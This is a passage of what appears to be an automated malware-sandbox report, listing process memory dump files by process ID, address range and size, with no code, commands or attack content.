memory/2820-384-0x0000000000CF0000-0x000000000105C000-memory.dmpFilesize
3.4MB
-
memory/2820-150-0x0000000077390000-0x000000007751E000-memory.dmpFilesize
1.6MB
-
memory/2820-151-0x0000000077390000-0x000000007751E000-memory.dmpFilesize
1.6MB
-
memory/2820-509-0x0000000000CF0000-0x000000000105C000-memory.dmpFilesize
3.4MB
-
memory/2820-152-0x0000000077390000-0x000000007751E000-memory.dmpFilesize
1.6MB
-
memory/2820-230-0x0000000077390000-0x000000007751E000-memory.dmpFilesize
1.6MB
-
memory/2820-231-0x0000000077390000-0x000000007751E000-memory.dmpFilesize
1.6MB
-
memory/2820-153-0x0000000077390000-0x000000007751E000-memory.dmpFilesize
1.6MB
-
memory/2820-154-0x0000000077390000-0x000000007751E000-memory.dmpFilesize
1.6MB
-
memory/2820-155-0x0000000077390000-0x000000007751E000-memory.dmpFilesize
1.6MB
-
memory/2820-156-0x0000000077390000-0x000000007751E000-memory.dmpFilesize
1.6MB
-
memory/2820-263-0x0000000000CF0000-0x000000000105C000-memory.dmpFilesize
3.4MB
-
memory/2820-162-0x0000000077390000-0x000000007751E000-memory.dmpFilesize
1.6MB
-
memory/2820-157-0x0000000077390000-0x000000007751E000-memory.dmpFilesize
1.6MB
-
memory/2820-158-0x0000000077390000-0x000000007751E000-memory.dmpFilesize
1.6MB
-
memory/3168-288-0x0000000000000000-mapping.dmp
-
memory/3248-248-0x0000000000000000-mapping.dmp
-
memory/3472-217-0x0000000077390000-0x000000007751E000-memory.dmpFilesize
1.6MB
-
memory/3472-224-0x0000000077390000-0x000000007751E000-memory.dmpFilesize
1.6MB
-
memory/3472-363-0x0000000005B80000-0x0000000005BB2000-memory.dmpFilesize
200KB
-
memory/3472-236-0x0000000077390000-0x000000007751E000-memory.dmpFilesize
1.6MB
-
memory/3472-235-0x0000000077390000-0x000000007751E000-memory.dmpFilesize
1.6MB
-
memory/3472-234-0x0000000077390000-0x000000007751E000-memory.dmpFilesize
1.6MB
-
memory/3472-233-0x0000000077390000-0x000000007751E000-memory.dmpFilesize
1.6MB
-
memory/3472-232-0x0000000077390000-0x000000007751E000-memory.dmpFilesize
1.6MB
-
memory/3472-229-0x0000000077390000-0x000000007751E000-memory.dmpFilesize
1.6MB
-
memory/3472-228-0x0000000077390000-0x000000007751E000-memory.dmpFilesize
1.6MB
-
memory/3472-226-0x0000000077390000-0x000000007751E000-memory.dmpFilesize
1.6MB
-
memory/3472-227-0x0000000077390000-0x000000007751E000-memory.dmpFilesize
1.6MB
-
memory/3472-225-0x0000000077390000-0x000000007751E000-memory.dmpFilesize
1.6MB
-
memory/3472-212-0x0000000000000000-mapping.dmp
-
memory/3472-223-0x0000000077390000-0x000000007751E000-memory.dmpFilesize
1.6MB
-
memory/3472-222-0x0000000077390000-0x000000007751E000-memory.dmpFilesize
1.6MB
-
memory/3472-220-0x0000000077390000-0x000000007751E000-memory.dmpFilesize
1.6MB
-
memory/3472-219-0x0000000077390000-0x000000007751E000-memory.dmpFilesize
1.6MB
-
memory/3472-218-0x0000000077390000-0x000000007751E000-memory.dmpFilesize
1.6MB
-
memory/3472-332-0x0000000000EB0000-0x0000000001382000-memory.dmpFilesize
4.8MB
-
memory/3472-216-0x0000000077390000-0x000000007751E000-memory.dmpFilesize
1.6MB
-
memory/3472-215-0x0000000077390000-0x000000007751E000-memory.dmpFilesize
1.6MB
-
memory/3472-214-0x0000000077390000-0x000000007751E000-memory.dmpFilesize
1.6MB
-
memory/3484-161-0x0000000000000000-mapping.dmp
-
memory/3484-168-0x000001ED3BD50000-0x000001ED3BD72000-memory.dmpFilesize
136KB
-
memory/3484-175-0x000001ED3BF00000-0x000001ED3BF76000-memory.dmpFilesize
472KB
-
memory/3824-261-0x0000000000000000-mapping.dmp
-
memory/4036-249-0x0000000000000000-mapping.dmp
-
memory/4048-259-0x0000000000000000-mapping.dmp
-
memory/4068-250-0x0000000000000000-mapping.dmp
-
memory/4176-281-0x0000000000000000-mapping.dmp
-
memory/4260-650-0x000001F2C7370000-0x000001F2C737A000-memory.dmpFilesize
40KB
-
memory/4260-617-0x000001F2C7510000-0x000001F2C75C9000-memory.dmpFilesize
740KB
-
memory/4260-611-0x000001F2C7350000-0x000001F2C736C000-memory.dmpFilesize
112KB
-
memory/4260-587-0x0000000000000000-mapping.dmp
-
memory/4472-274-0x0000000000000000-mapping.dmp
-
memory/4480-276-0x0000000000000000-mapping.dmp
-
memory/4512-275-0x0000000000000000-mapping.dmp
-
memory/4556-268-0x0000000000000000-mapping.dmp
-
memory/4624-459-0x0000000000000000-mapping.dmp
-
memory/4640-270-0x0000000000000000-mapping.dmp
-
memory/4652-271-0x0000000000000000-mapping.dmp
-
memory/4672-264-0x0000000000000000-mapping.dmp
-
memory/4804-562-0x00007FF7D7AD0000-0x00007FF7D87CA000-memory.dmpFilesize
13.0MB
-
memory/4804-563-0x00007FFF19E90000-0x00007FFF1A06B000-memory.dmpFilesize
1.9MB
-
memory/4804-504-0x00007FFF19E90000-0x00007FFF1A06B000-memory.dmpFilesize
1.9MB
-
memory/4804-487-0x00007FF7D7AD0000-0x00007FF7D87CA000-memory.dmpFilesize
13.0MB
-
memory/4804-1326-0x00007FF7D7AD0000-0x00007FF7D87CA000-memory.dmpFilesize
13.0MB
-
memory/4804-1327-0x00007FFF19E90000-0x00007FFF1A06B000-memory.dmpFilesize
1.9MB
-
memory/5632-882-0x0000000000000000-mapping.dmp
-
memory/5644-883-0x0000000000000000-mapping.dmp
-
memory/5676-885-0x0000000000000000-mapping.dmp
-
memory/5676-1314-0x000001FFFCF49000-0x000001FFFCF4F000-memory.dmpFilesize
24KB
-
memory/5676-1280-0x000001FFFF6B0000-0x000001FFFF6CC000-memory.dmpFilesize
112KB
-
memory/5848-898-0x0000000000000000-mapping.dmp
-
memory/5860-899-0x0000000000000000-mapping.dmp
-
memory/5880-900-0x0000000000000000-mapping.dmp
-
memory/5892-901-0x0000000000000000-mapping.dmp
-
memory/5932-905-0x0000000000000000-mapping.dmp
-
memory/5964-910-0x0000000000000000-mapping.dmp
-
memory/5996-913-0x0000000000000000-mapping.dmp
-
memory/6024-916-0x0000000000000000-mapping.dmp
-
memory/6036-917-0x0000000000000000-mapping.dmp
-
memory/6056-918-0x0000000000000000-mapping.dmp
-
memory/6072-919-0x0000000000000000-mapping.dmp
-
memory/6096-920-0x0000000000000000-mapping.dmp
-
memory/6116-921-0x0000000000000000-mapping.dmp
-
memory/6432-996-0x0000000000000000-mapping.dmp
-
memory/6544-1138-0x0000000000E50000-0x00000000011BC000-memory.dmpFilesize
3.4MB
-
memory/6544-1153-0x0000000000E50000-0x00000000011BC000-memory.dmpFilesize
3.4MB
-
memory/6544-1290-0x0000000000E50000-0x00000000011BC000-memory.dmpFilesize
3.4MB
-
memory/6544-1291-0x0000000000E50000-0x00000000011BC000-memory.dmpFilesize
3.4MB
-
memory/7912-1315-0x00007FF681B014E0-mapping.dmp
-
memory/7936-1318-0x0000000000000000-mapping.dmp
-
memory/7952-1320-0x0000000000000000-mapping.dmp
-
memory/8016-1321-0x0000000000000000-mapping.dmp
-
memory/8060-1329-0x00007FF76EE40000-0x00007FF76F634000-memory.dmpFilesize
8.0MB
-
memory/8060-1328-0x00007FF76EE40000-0x00007FF76F634000-memory.dmpFilesize
8.0MB
-
memory/8060-1324-0x00007FF76F6325D0-mapping.dmp
-
memory/106112-348-0x0000000000000000-mapping.dmp
-
memory/106148-493-0x0000000009D60000-0x000000000A366000-memory.dmpFilesize
6.0MB
-
memory/106148-1154-0x000000000B030000-0x000000000B04E000-memory.dmpFilesize
120KB
-
memory/106148-578-0x000000000A980000-0x000000000AB42000-memory.dmpFilesize
1.8MB
-
memory/106148-579-0x000000000B080000-0x000000000B5AC000-memory.dmpFilesize
5.2MB
-
memory/106148-539-0x00000000096F0000-0x000000000973B000-memory.dmpFilesize
300KB
-
memory/106148-582-0x000000000B5B0000-0x000000000BAAE000-memory.dmpFilesize
5.0MB
-
memory/106148-585-0x000000000AB50000-0x000000000ABB6000-memory.dmpFilesize
408KB
-
memory/106148-498-0x0000000009650000-0x0000000009662000-memory.dmpFilesize
72KB
-
memory/106148-541-0x0000000009960000-0x0000000009A6A000-memory.dmpFilesize
1.0MB
-
memory/106148-1030-0x000000000AEB0000-0x000000000AF42000-memory.dmpFilesize
584KB
-
memory/106148-457-0x0000000000400000-0x000000000041E000-memory.dmpFilesize
120KB
-
memory/106148-365-0x000000000041972E-mapping.dmp
-
memory/106148-1031-0x000000000AF50000-0x000000000AFC6000-memory.dmpFilesize
472KB
-
memory/106148-510-0x00000000096B0000-0x00000000096EE000-memory.dmpFilesize
248KB
-
memory/106448-397-0x00000000004088B5-mapping.dmp
-
memory/106448-482-0x0000000000400000-0x0000000000412000-memory.dmpFilesize
72KB